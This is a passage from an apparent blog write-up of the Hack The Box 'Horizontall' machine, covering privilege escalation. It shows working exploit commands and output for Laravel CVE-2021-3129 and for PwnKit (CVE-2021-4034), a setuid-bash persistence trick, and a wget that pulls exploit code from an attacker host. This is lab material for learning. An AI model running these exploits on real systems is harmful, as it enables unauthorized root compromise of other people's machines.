<h2 id=vi-real-privilege-escalation>VI. Real privilege escalation<a hidden class=anchor aria-hidden=true href=#vi-real-privilege-escalation>#</a></h2>
<p>There still is another strange opening port - port <code>8000</code>. After another bit of port forwarding:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>ssh -i key/id_rsa -L 9999:127.0.0.1:8000 strapi@horizontall.htb
</code></pre></div><p>Then access it through <code>localhost:9999</code>, we get a fresh <code>Laravel</code> page.
<img src=/img/horizontall/laravel-docs.png#center alt>
</p>
<p>Notice this small line in the bottom right corner?</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-html data-lang=html>Laravel v8 (PHP v7.4.18)
</code></pre></div><p>Several vulnerabilities were found in no time:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>$ searchsploit laravel <span style=color:#ae81ff>8</span>
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Aimeos Laravel ecommerce platform 2021.10 LTS - <span style=color:#e6db74>&#39;sort&#39;</span> SQL injection                 | php/webapps/50538.txt
Laravel - <span style=color:#e6db74>&#39;Hash::make()&#39;</span> Password Truncation Security                                | multiple/remote/39318.txt
Laravel 8.4.2 debug mode - Remote code execution                                     | php/webapps/49424.py
Laravel Nova 3.7.0 - <span style=color:#e6db74>&#39;range&#39;</span> DoS                                                     | php/webapps/49198.txt
PHP Laravel 8.70.1 - Cross Site Scripting <span style=color:#f92672>(</span>XSS<span style=color:#f92672>)</span> to Cross Site Request Forgery <span style=color:#f92672>(</span>CSRF<span style=color:#f92672>)</span> | php/webapps/50525.txt
UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read                            | php/webapps/48166.txt
UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload                   | php/webapps/46389.py
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
</code></pre></div><p>Mostly are <code>Python 3</code> exploits. We can do port forwarding, or directly load the exploit to the server. However, given that the server has Python3:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>strapi@horizontall:~$ python3 -V
Python 3.6.9
</code></pre></div><p>The latter seems better. However&mldr;</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python>strapi<span style=color:#a6e22e>@horizontall</span>:<span style=color:#f92672>~</span><span style=color:#960050;background-color:#1e0010>$</span> python3 rt<span style=color:#f92672>.</span>py http:<span style=color:#f92672>//</span><span style=color:#ae81ff>127.0.0.1</span>:<span style=color:#ae81ff>8000</span> <span style=color:#f92672>/</span>var<span style=color:#f92672>/</span>www<span style=color:#f92672>/</span>html<span style=color:#f92672>/</span>laravel<span style=color:#f92672>/</span>storage<span style=color:#f92672>/</span>logs<span style=color:#f92672>/</span>laravel<span style=color:#f92672>.</span>log <span style=color:#e6db74>&#39;whoami&#39;</span>                                                                                                                             
                                                                                                                                                                                                                                              
Exploit<span style=color:#f92672>...</span>                                                                                                                                                                                                                                    
Traceback (most recent call last):                                                                                                                                                                                                            
  File <span style=color:#e6db74>&#34;/usr/lib/python3/dist-packages/urllib3/connectionpool.py&#34;</span>, line <span style=color:#ae81ff>601</span>, <span style=color:#f92672>in</span> urlopen                                                                                                                                                       
    chunked<span style=color:#f92672>=</span>chunked)                                                                                                                                                                                                                          
  File <span style=color:#e6db74>&#34;/usr/lib/python3/dist-packages/urllib3/connectionpool.py&#34;</span>, line <span style=color:#ae81ff>387</span>, <span style=color:#f92672>in</span> _make_request                                                                                                                                                 
    six<span style=color:#f92672>.</span>raise_from(e, <span style=color:#66d9ef>None</span>)                                                                                                                                                                                                                   
  File <span style=color:#e6db74>&#34;&lt;string&gt;&#34;</span>, line <span style=color:#ae81ff>3</span>, <span style=color:#f92672>in</span> raise_from                                                                                                                                                                                                      
  File <span style=color:#e6db74>&#34;/usr/lib/python3/dist-packages/urllib3/connectionpool.py&#34;</span>, line <span style=color:#ae81ff>383</span>, <span style=color:#f92672>in</span> _make_request                                                                                                                                                 
    httplib_response <span style=color:#f92672>=</span> conn<span style=color:#f92672>.</span>getresponse()                                                                                                                                                                                                     
  File <span style=color:#e6db74>&#34;/usr/lib/python3.6/http/client.py&#34;</span>, line <span style=color:#ae81ff>1373</span>, <span style=color:#f92672>in</span> getresponse                                                                                                                                                                         
    response<span style=color:#f92672>.</span>begin()                                                                                                                                                                                                                          
  File <span style=color:#e6db74>&#34;/usr/lib/python3.6/http/client.py&#34;</span>, line <span style=color:#ae81ff>311</span>, <span style=color:#f92672>in</span> begin                                                                                                                                                                                
    version, status, reason <span style=color:#f92672>=</span> self<span style=color:#f92672>.</span>_read_status()                                                                                                                                                                                             
  File <span style=color:#e6db74>&#34;/usr/lib/python3.6/http/client.py&#34;</span>, line <span style=color:#ae81ff>280</span>, <span style=color:#f92672>in</span> _read_status                                                                                                                                                                         
    <span style=color:#66d9ef>raise</span> RemoteDisconnected(<span style=color:#e6db74>&#34;Remote end closed connection without&#34;</span>
http<span style=color:#f92672>.</span>client<span style=color:#f92672>.</span>RemoteDisconnected: Remote end closed connection without response
</code></pre></div><p>&mldr; the exploit refused to work&mldr; And thus, a quick search led me to <a href=https://github.com/nth347/CVE-2021-3129_exploit>a year old Github repo</a>.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>strapi@horizontall:~$ python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 id
<span style=color:#f92672>[</span>i<span style=color:#f92672>]</span> Trying to clear logs
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Logs cleared
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> PHPGGC found. Generating payload and deploy it to the target
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Successfully converted logs to PHAR
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> PHAR deserialized. Exploited

uid<span style=color:#f92672>=</span>0<span style=color:#f92672>(</span>root<span style=color:#f92672>)</span> gid<span style=color:#f92672>=</span>0<span style=color:#f92672>(</span>root<span style=color:#f92672>)</span> groups<span style=color:#f92672>=</span>0<span style=color:#f92672>(</span>root<span style=color:#f92672>)</span>

<span style=color:#f92672>[</span>i<span style=color:#f92672>]</span> Trying to clear logs
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Logs cleared
</code></pre></div><p>This time, it worked perfectly. Hence, dive into the real thing, let&rsquo;s copy <code>/bin/bash</code> to some other directory, change its owner and set SUID permission for it.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>strapi@horizontall:~$ cp /bin/bash ~
strapi@horizontall:~$ python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 <span style=color:#e6db74>&#34;chown root:root /opt/strapi/bash; chmod +s /opt/strapi/bash&#34;</span>
<span style=color:#f92672>[</span>i<span style=color:#f92672>]</span> Trying to clear logs
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Logs cleared
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> PHPGGC found. Generating payload and deploy it to the target
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Successfully converted logs to PHAR
<span style=color:#f92672>[</span>i<span style=color:#f92672>]</span> There is no output
<span style=color:#f92672>[</span>i<span style=color:#f92672>]</span> Trying to clear logs
<span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Logs cleared
</code></pre></div><p>And just like that, we now have root access.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>strapi@horizontall:~$ ls
bash  myapi
strapi@horizontall:~$ ./bash -p
bash-4.4# id
uid<span style=color:#f92672>=</span>1001<span style=color:#f92672>(</span>strapi<span style=color:#f92672>)</span> gid<span style=color:#f92672>=</span>1001<span style=color:#f92672>(</span>strapi<span style=color:#f92672>)</span> euid<span style=color:#f92672>=</span>0<span style=color:#f92672>(</span>root<span style=color:#f92672>)</span> egid<span style=color:#f92672>=</span>0<span style=color:#f92672>(</span>root<span style=color:#f92672>)</span> groups<span style=color:#f92672>=</span>0<span style=color:#f92672>(</span>root<span style=color:#f92672>)</span>,1001<span style=color:#f92672>(</span>strapi<span style=color:#f92672>)</span>
</code></pre></div><h2 id=vii-extra>VII. Extra<a hidden class=anchor aria-hidden=true href=#vii-extra>#</a></h2>
<p>For the time of writing (nearly 5 months after the box release), there&rsquo;s another novel, safe and reliable method to get root access via <a href=https://github.com/berdav/CVE-2021-4034>CVE-2021-4034</a>. This is probably not intentional, but it worked nonetheless.</p>
<p>From our attacker machine:</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>wget https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.zip -O polkit.zip
</code></pre></div><p>Load that to server machine, <code>make</code> it there, and get root.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>strapi@horizontall:~$ wget http://10.10.16.13/polkit.zip
--2022-02-03 12:55:45--  http://10.10.16.13/polkit.zip
Connecting to 10.10.16.13:80... connected.
HTTP request sent, awaiting response... l200 OK
Length: <span style=color:#ae81ff>6457</span> <span style=color:#f92672>(</span>6.3K<span style=color:#f92672>)</span> <span style=color:#f92672>[</span>application/zip<span style=color:#f92672>]</span>
Saving to: ‘polkit.zip’

polkit.zip                    100%<span style=color:#f92672>[===============================================</span>&gt;<span style=color:#f92672>]</span>   6.31K  --.-KB/s    in 0.04s

2022-02-03 12:55:45 <span style=color:#f92672>(</span><span style=color:#ae81ff>175</span> KB/s<span style=color:#f92672>)</span> - ‘polkit.zip’ saved <span style=color:#f92672>[</span>6457/6457<span style=color:#f92672>]</span>

strapi@horizontall:~$ unzip polkit.zip
Archive:  polkit.zip
55d60e381ef90463ed35f47af44bf7e2fbc150d4
   creating: CVE-2021-4034-main/
  inflating: CVE-2021-4034-main/.gitignore
  inflating: CVE-2021-4034-main/LICENSE
  inflating: CVE-2021-4034-main/Makefile
  inflating: CVE-2021-4034-main/README.md
  inflating: CVE-2021-4034-main/cve-2021-4034.c
  inflating: CVE-2021-4034-main/cve-2021-4034.sh
   creating: CVE-2021-4034-main/dry-run/
  inflating: CVE-2021-4034-main/dry-run/Makefile
  inflating: CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c
  inflating: CVE-2021-4034-main/dry-run/pwnkit-dry-run.c
  inflating: CVE-2021-4034-main/pwnkit.c
strapi@horizontall:~$ cd CVE-2021-4034-main/
strapi@horizontall:~/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo <span style=color:#e6db74>&#34;module UTF-8// PWNKIT// pwnkit 1&#34;</span> &gt; gconv-modules
mkdir -p GCONV_PATH<span style=color:#f92672>=</span>.
cp -f /bin/true GCONV_PATH<span style=color:#f92672>=</span>./pwnkit.so:.
strapi@horizontall:~/CVE-2021-4034-main$ ls
 cve-2021-4034     cve-2021-4034.sh   gconv-modules   LICENSE    pwnkit.c    README.md
 cve-2021-4034.c   dry-run           <span style=color:#e6db74>&#39;GCONV_PATH=.&#39;</span>   Makefile   pwnkit.so
strapi@horizontall:~/CVE-2021-4034-main$ ./cve-2021-4034
<span style=color:#75715e># id</span>
uid<span style=color:#f92672>=</span>0<span style=color:#f92672>(</span>root<span style=color:#f92672>)</span> gid<span style=color:#f92672>=</span>0<span style=color:#f92672>(</span>root<span style=color:#f92672>)</span> groups<span style=color:#f92672>=</span>0<span style=color:#f92672>(</span>root<span style=color:#f92672>)</span>,1001<span style=color:#f92672>(</span>strapi<span style=color:#f92672>)</span>
</code></pre></div><p>Very simple and reliable.</p>
<h2 id=final-words>Final words<a hidden class=anchor aria-hidden=true href=#final-words>#</a></h2>
<p>And that&rsquo;s it. No special technique - this machine just runs slightly outdated softwares. The lesson can be drawn from this box is to think carefully before dive into rabbit holes and update your machine as soon as security patches come out!</p>
</div>
<footer class=post-footer>
<ul class=post-tags>
<li><a href=https://git-akihakune.github.io/tags/ctf/>ctf</a></li>
<li><a href=https://git-akihakune.github.io/tags/tech/>tech</a></li>
<li><a href=https://git-akihakune.github.io/tags/htb/>htb</a></li>
</ul>
<nav class=paginav>
<a class=prev href=https://git-akihakune.github.io/blog/driver/>
<span class=title>« Prev Page</span>
<br>
<span>Hack The Box - Driver</span>
</a>
<a class=next href=https://git-akihakune.github.io/blog/blueprint/>
<span class=title>Next Page »</span>
<br>
<span>Try Hack Me - Blueprint</span>
</a>
</nav>
<div class=share-buttons>
<a target=_blank rel="noopener noreferrer" aria-label="share Hack The Box - Horizontall on twitter" href="https://twitter.com/intent/tweet/?text=Hack%20The%20Box%20-%20Horizontall&url=https%3a%2f%2fgit-akihakune.github.io%2fblog%2fhorizontall%2f&hashtags=ctf%2ctech%2chtb"><svg viewBox="0 0 512 512"><path d="M449.446.0C483.971.0 512 28.03 512 62.554v386.892C512 483.97 483.97 512 449.446 512H62.554c-34.524.0-62.554-28.03-62.554-62.554V62.554c0-34.524 28.029-62.554 62.554-62.554h386.892zM195.519 424.544c135.939.0 210.268-112.643 210.268-210.268.0-3.218.0-6.437-.153-9.502 14.406-10.421 26.973-23.448 36.935-38.314-13.18 5.824-27.433 9.809-42.452 11.648 15.326-9.196 26.973-23.602 32.49-40.92-14.252 8.429-30.038 14.56-46.896 17.931-13.487-14.406-32.644-23.295-53.946-23.295-40.767.0-73.87 33.104-73.87 73.87.0 5.824.613 11.494 1.992 16.858-61.456-3.065-115.862-32.49-152.337-77.241-6.284 10.881-9.962 23.601-9.962 37.088.0 25.594 13.027 48.276 32.95 61.456-12.107-.307-23.448-3.678-33.41-9.196v.92c0 35.862 25.441 65.594 59.311 72.49-6.13 1.686-12.72 2.606-19.464 2.606-4.751.0-9.348-.46-13.946-1.38 9.349 29.426 36.628 50.728 68.965 51.341-25.287 19.771-57.164 31.571-91.8 31.571-5.977.0-11.801-.306-17.625-1.073 32.337 21.15 71.264 33.41 112.95 33.41z"/></svg>
</a>
<a target=_blank rel="noopener noreferrer" aria-label="share Hack The Box - Horizontall on linkedin" href="https://www.linkedin.com/shareArticle?mini=true&url=https%3a%2f%2fgit-akihakune.github.io%2fblog%2fhorizontall%2f&title=Hack%20The%20Box%20-%20Horizontall&summary=Hack%20The%20Box%20-%20Horizontall&source=https%3a%2f%2fgit-akihakune.github.io%2fblog%2fhorizontall%2f"><svg viewBox="0 0 512 512"><path d="M449.446.0C483.971.0 512 28.03 512 62.554v386.892C512 483.97 483.97 512 449.446 512H62.554c-34.524.0-62.554-28.03-62.554-62.554V62.554c0-34.524 28.029-62.554 62.554-62.554h386.892zM160.461 423.278V197.561h-75.04v225.717h75.04zm270.539.0V293.839c0-69.333-37.018-101.586-86.381-101.586-39.804.0-57.634 21.891-67.617 37.266v-31.958h-75.021c.995 21.181.0 225.717.0 225.717h75.02V297.222c0-6.748.486-13.492 2.474-18.315 5.414-13.475 17.767-27.434 38.494-27.434 27.135.0 38.007 20.707 38.007 51.037v120.768H431zM123.448 88.722C97.774 88.722 81 105.601 81 127.724c0 21.658 16.264 39.002 41.455 39.002h.484c26.165.0 42.452-17.344 42.452-39.002-.485-22.092-16.241-38.954-41.943-39.002z"/></svg>
</a>
<a target=_blank rel="noopener noreferrer" aria-label="share Hack The Box - Horizontall on reddit" href="https://reddit.com/submit?url=https%3a%2f%2fgit-akihakune.github.io%2fblog%2fhorizontall%2f&title=Hack%20The%20Box%20-%20Horizontall"><svg viewBox="0 0 512 512"><path d="M449.446.0C483.971.0 512 28.03 512 62.554v386.892C512 483.97 483.97 512 449.446 512H62.554c-34.524.0-62.554-28.03-62.554-62.554V62.554c0-34.524 28.029-62.554 62.554-62.554h386.892zM446 265.638c0-22.964-18.616-41.58-41.58-41.58-11.211.0-21.361 4.457-28.841 11.666-28.424-20.508-67.586-33.757-111.204-35.278l18.941-89.121 61.884 13.157c.756 15.734 13.642 28.29 29.56 28.29 16.407.0 29.706-13.299 29.706-29.701.0-16.403-13.299-29.702-29.706-29.702-11.666.0-21.657 6.792-26.515 16.578l-69.105-14.69c-1.922-.418-3.939-.042-5.585 1.036-1.658 1.073-2.811 2.761-3.224 4.686l-21.152 99.438c-44.258 1.228-84.046 14.494-112.837 35.232-7.468-7.164-17.589-11.591-28.757-11.591-22.965.0-41.585 18.616-41.585 41.58.0 16.896 10.095 31.41 24.568 37.918-.639 4.135-.99 8.328-.99 12.576.0 63.977 74.469 115.836 166.33 115.836s166.334-51.859 166.334-115.836c0-4.218-.347-8.387-.977-12.493 14.564-6.47 24.735-21.034 24.735-38.001zM326.526 373.831c-20.27 20.241-59.115 21.816-70.534 21.816-11.428.0-50.277-1.575-70.522-21.82-3.007-3.008-3.007-7.882.0-10.889 3.003-2.999 7.882-3.003 10.885.0 12.777 12.781 40.11 17.317 59.637 17.317 19.522.0 46.86-4.536 59.657-17.321 3.016-2.999 7.886-2.995 10.885.008 3.008 3.011 3.003 7.882-.008 10.889zm-5.23-48.781c-16.373.0-29.701-13.324-29.701-29.698.0-16.381 13.328-29.714 29.701-29.714 16.378.0 29.706 13.333 29.706 29.714.0 16.374-13.328 29.698-29.706 29.698zM160.91 295.348c0-16.381 13.328-29.71 29.714-29.71 16.369.0 29.689 13.329 29.689 29.71.0 16.373-13.32 29.693-29.689 29.693-16.386.0-29.714-13.32-29.714-29.693z"/></svg>
</a>
<a target=_blank rel="noopener noreferrer" aria-label="share Hack The Box - Horizontall on facebook" href="https://facebook.com/sharer/sharer.php?u=https%3a%2f%2fgit-akihakune.github.io%2fblog%2fhorizontall%2f"><svg viewBox="0 0 512 512"><path d="M449.446.0C483.971.0 512 28.03 512 62.554v386.892C512 483.97 483.97 512 449.446 512H342.978V319.085h66.6l12.672-82.621h-79.272v-53.617c0-22.603 11.073-44.636 46.58-44.636H425.6v-70.34s-32.71-5.582-63.982-5.582c-65.288.0-107.96 39.569-107.96 111.204v62.971h-72.573v82.621h72.573V512h-191.104c-34.524.0-62.554-28.03-62.554-62.554V62.554c0-34.524 28.029-62.554 62.554-62.554h386.892z"/></svg>
</a>
<a target=_blank rel="noopener noreferrer" aria-label="share Hack The Box - Horizontall on whatsapp" href="https://api.whatsapp.com/send?text=Hack%20The%20Box%20-%20Horizontall%20-%20https%3a%2f%2fgit-akihakune.github.io%2fblog%2fhorizontall%2f"><svg viewBox="0 0 512 512"><path d="M449.446.0C483.971.0 512 28.03 512 62.554v386.892C512 483.97 483.97 512 449.446 512H62.554c-34.524.0-62.554-28.03-62.554-62.554V62.554c0-34.524 28.029-62.554 62.554-62.554h386.892zm-58.673 127.703c-33.842-33.881-78.847-52.548-126.798-52.568-98.799.0-179.21 80.405-179.249 179.234-.013 31.593 8.241 62.428 23.927 89.612l-25.429 92.884 95.021-24.925c26.181 14.28 55.659 21.807 85.658 21.816h.074c98.789.0 179.206-80.413 179.247-179.243.018-47.895-18.61-92.93-52.451-126.81zM263.976 403.485h-.06c-26.734-.01-52.954-7.193-75.828-20.767l-5.441-3.229-56.386 14.792 15.05-54.977-3.542-5.637c-14.913-23.72-22.791-51.136-22.779-79.287.033-82.142 66.867-148.971 149.046-148.971 39.793.014 77.199 15.531 105.329 43.692 28.128 28.16 43.609 65.592 43.594 105.4-.034 82.149-66.866 148.983-148.983 148.984zm81.721-111.581c-4.479-2.242-26.499-13.075-30.604-14.571-4.105-1.495-7.091-2.241-10.077 2.241-2.986 4.483-11.569 14.572-14.182 17.562-2.612 2.988-5.225 3.364-9.703 1.12-4.479-2.241-18.91-6.97-36.017-22.23C231.8 264.15 222.81 249.484 220.198 245s-.279-6.908 1.963-9.14c2.016-2.007 4.48-5.232 6.719-7.847 2.24-2.615 2.986-4.484 4.479-7.472 1.493-2.99.747-5.604-.374-7.846-1.119-2.241-10.077-24.288-13.809-33.256-3.635-8.733-7.327-7.55-10.077-7.688-2.609-.13-5.598-.158-8.583-.158-2.986.0-7.839 1.121-11.944 5.604-4.105 4.484-15.675 15.32-15.675 37.364.0 22.046 16.048 43.342 18.287 46.332 2.24 2.99 31.582 48.227 76.511 67.627 10.685 4.615 19.028 7.371 25.533 9.434 10.728 3.41 20.492 2.929 28.209 1.775 8.605-1.285 26.499-10.833 30.231-21.295 3.732-10.464 3.732-19.431 2.612-21.298-1.119-1.869-4.105-2.99-8.583-5.232z"/></svg>
</a>
<a target=_blank rel="noopener noreferrer" aria-label="share Hack The Box - Horizontall on telegram" href="https://telegram.me/share/url?text=Hack%20The%20Box%20-%20Horizontall&url=https%3a%2f%2fgit-akihakune.github.io%2fblog%2fhorizontall%2f"><svg viewBox="2 2 28 28"><path d="M26.49 29.86H5.5a3.37 3.37.0 01-2.47-1 3.35 3.35.0 01-1-2.47V5.48A3.36 3.36.0 013 3 3.37 3.37.0 015.5 2h21A3.38 3.38.0 0129 3a3.36 3.36.0 011 2.46V26.37a3.35 3.35.0 01-1 2.47 3.38 3.38.0 01-2.51 1.02zm-5.38-6.71a.79.79.0 00.85-.66L24.73 9.24a.55.55.0 00-.18-.46.62.62.0 00-.41-.17q-.08.0-16.53 6.11a.59.59.0 00-.41.59.57.57.0 00.43.52l4 1.24 1.61 4.83a.62.62.0 00.63.43.56.56.0 00.4-.17L16.54 20l4.09 3A.9.9.0 0021.11 23.15zM13.8 20.71l-1.21-4q8.72-5.55 8.78-5.55c.15.0.23.0.23.16a.18.18.0 010 .06s-2.51 2.3-7.52 6.8z"/></svg>
</a>
</div>
</footer><script src=https://utteranc.es/client.js repo=git-akihakune/git-akihakune.github.io issue-term=pathname theme=photon-dark crossorigin=anonymous async></script>
</article>
</main>
<footer class=footer>
<span>&copy; 2022 <a href=https://git-akihakune.github.io>Hakune Blog</a></span>
- Aki Hakune
</footer>
<a href=#top aria-label="go to top" title="Go to Top (Alt + G)" class=top-link id=top-link accesskey=g><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentcolor"><path d="M12 6H0l6-6z"/></svg>
</a><script src=https://cdnjs.cloudflare.com/ajax/libs/medium-zoom/1.0.6/medium-zoom.min.js integrity="sha512-N9IJRoc3LaP3NDoiGkcPa4gG94kapGpaA5Zq9/Dr04uf5TbLFU5q0o8AbRhLKUUlp8QFS2u7S+Yti0U7QtuZvQ==" crossorigin=anonymous referrerpolicy=no-referrer></script>
<script>const images=Array.from(document.querySelectorAll(".post-content img"));images.forEach(a=>{mediumZoom(a,{margin:0,scrollOffset:40,container:null,template:null,background:'rgba(0, 0, 0, 0.8)'})})</script>
<script>let menu=document.getElementById('menu');menu&&(menu.scrollLeft=localStorage.getItem("menu-scroll-position"),menu.onscroll=function(){localStorage.setItem("menu-scroll-position",menu.scrollLeft)}),document.querySelectorAll('a[href^="#"]').forEach(a=>{a.addEventListener("click",function(b){b.preventDefault();var a=this.getAttribute("href").substr(1);window.matchMedia('(prefers-reduced-motion: reduce)').matches?document.querySelector(`[id='${decodeURIComponent(a)}']`).scrollIntoView():document.querySelector(`[id='${decodeURIComponent(a)}']`).scrollIntoView({behavior:"smooth"}),a==="top"?history.replaceState(null,null," "):history.pushState(null,null,`#${a}`)})})</script>
<script>var mybutton=document.getElementById("top-link");window.onscroll=function(){document.body.scrollTop>800||document.documentElement.scrollTop>800?(mybutton.style.visibility="visible",mybutton.style.opacity="1"):(mybutton.style.visibility="hidden",mybutton.style.opacity="0")}</script>
<script>document.getElementById("theme-toggle").addEventListener("click",()=>{document.body.className.includes("dark")?(document.body.classList.remove('dark'),localStorage.setItem("pref-theme",'light')):(document.body.classList.add('dark'),localStorage.setItem("pref-theme",'dark'))})</script>
<script>document.querySelectorAll('pre > code').forEach(b=>{const c=b.parentNode.parentNode,a=document.createElement('button');a.classList.add('copy-code'),a.innerText='copy';function d(){a.innerText='copied!',setTimeout(()=>{a.innerText='copy'},2e3)}a.addEventListener('click',e=>{if('clipboard'in navigator){navigator.clipboard.writeText(b.textContent),d();return}const a=document.createRange();a.selectNodeContents(b);const c=window.getSelection();c.removeAllRanges(),c.addRange(a);try{document.execCommand('copy'),d()}catch(a){}c.removeRange(a)}),c.classList.contains("highlight")?c.appendChild(a):c.parentNode.firstChild==c||(b.parentNode.parentNode.parentNode.parentNode.parentNode.nodeName=="TABLE"?b.parentNode.parentNode.parentNode.parentNode.parentNode.appendChild(a):b.parentNode.appendChild(a))})</script>
</body>
</html>